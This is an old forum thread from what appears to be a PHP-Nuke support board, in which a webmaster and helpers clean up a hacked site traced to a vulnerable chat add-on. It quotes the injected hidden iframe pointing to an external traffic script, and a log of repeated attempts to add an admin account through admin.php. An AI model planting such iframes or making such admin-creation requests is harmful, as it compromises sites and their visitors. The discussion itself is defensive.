Script Attack

Hangin' Around Joined: Jun 30, 2003 Posts: 39

Hi,
Something wierd happened to my site today, looks like I was hacked.
There is this script prompt that comes up everytime you try to access the site:
http://www.xxxxxx.com/

I don't know what kind of script it is and where it comes from or what is causing it, I found this in my config.php file:

Code:

<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

And there is another file that I deleted on the server root directory that was not familiar to me.

I delete it, but it is still happening.
You do not see the script prompt on Firefox, only on IE.

I am running 7.6 and have the sentinel

Sells PC To Pay For Divorce Joined: Posts: 5661

yes indeed, it nearly trashes the browser....
but i see you have coppermine?
can you disable that?

Posted: Mon Jun 12, 2006 3:57 pm

btw...i still find the same hack code on your index...

Posted: Mon Jun 12, 2006 4:00 pm

the frame with code is between your chat block and donations block.

Posted: Mon Jun 12, 2006 4:24 pm

I uploaded a clean version of index.php,mainfile.php, config.php but it was still happening...

I just renamed the chat folder, can you check if it is still there?

Posted: Mon Jun 12, 2006 4:26 pm

its gone now.....
refresh your browser and delete history.

Posted: Mon Jun 12, 2006 4:37 pm

Thanks guys

Posted: Mon Jun 12, 2006 4:38 pm

YW

Posted: Mon Jun 12, 2006 4:45 pm

I still do not know how he put that iframe in my config.php

Code:

the frame with code is between your chat block and donations block.

How did you figure this out?

Posted: Mon Jun 12, 2006 4:50 pm

well its not that easy figuring out how these idiots did that...
You should realise that there are many addons for nuke that are vunerable and that goes for chats and gallery's...

if you have addons running giving certain rights to the outside you can get hacked in many ways...
how did they isnt that important anymore...
make sure you close ever hole..

and how i found it was easy..
just by looking at your source.

Posted: Mon Jun 12, 2006 6:08 pm

I deleted the chat folder ( it is from flashchat addon module), I posted the hack in their forum.

I also keep getting this message everyday now, everytime sentinel blocks the IP, he changes to a new one:

Code:

Date &amp; Time: 2006-06-12 18:23:38 CDT GMT -0500


Blocked IP: 196.206.99.*


User ID: Anonymous (1)


Reason: Abuse-Author


--------------------


User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4


Query String: www.xxxxxx.com/admin.php?op=AddAuthor&add_aid=tigersha


Get String: www.xxxxxx.com/admin.php?op=AddAuthor&add_aid=tigersha


Post String: www.xxxxxx.com/admin.php


Forwarded For: none


Client IP: none


Remote Address: 196.206.99.90


Remote Port: 52254


Request Method: GET


--------------------


Who-Is for IP


OrgName:    African Network Information Center 


OrgID:      AFRINIC


Address:    03B3 - 3rd Floor - Ebene Cyber Tower


Address:    Cyber City


Address:    Ebene


Address:    Mauritius


City:       Ebene


StateProv:  


PostalCode: 0001


Country:    MU





NetRange:   196.0.0.0 - 196.255.255.255 


CIDR:       196.0.0.0/8 


NetName:    NET196


NetHandle:  NET-196-0-0-0-0


Parent:    


NetType:    Allocated to AfriNIC


NameServer: NS1.AFRINIC.NET


NameServer: NS-SEC.RIPE.NET


NameServer: NS.LACNIC.NET


NameServer: TINNIE.ARIN.NET


NameServer: SEC1.APNIC.NET


NameServer: SEC3.APNIC.NET


Comment:    


RegDate:    1993-05-01


Updated:    2006-04-27





OrgAbuseHandle: GENER11-ARIN


OrgAbuseName:   Generic POC 


OrgAbusePhone:  +230 4666616


OrgAbuseEmail:  abusepoc@afrinic.net





OrgTechHandle: GENER11-ARIN


OrgTechName:   Generic POC 


OrgTechPhone:  +230 4666616


OrgTechEmail:  abusepoc@afrinic.net

Posted: Mon Jun 12, 2006 6:11 pm

yeah well,welcome to the club....
they try,get blocked,they try,get blocked.....
its like a game....they continue....mostly by remote..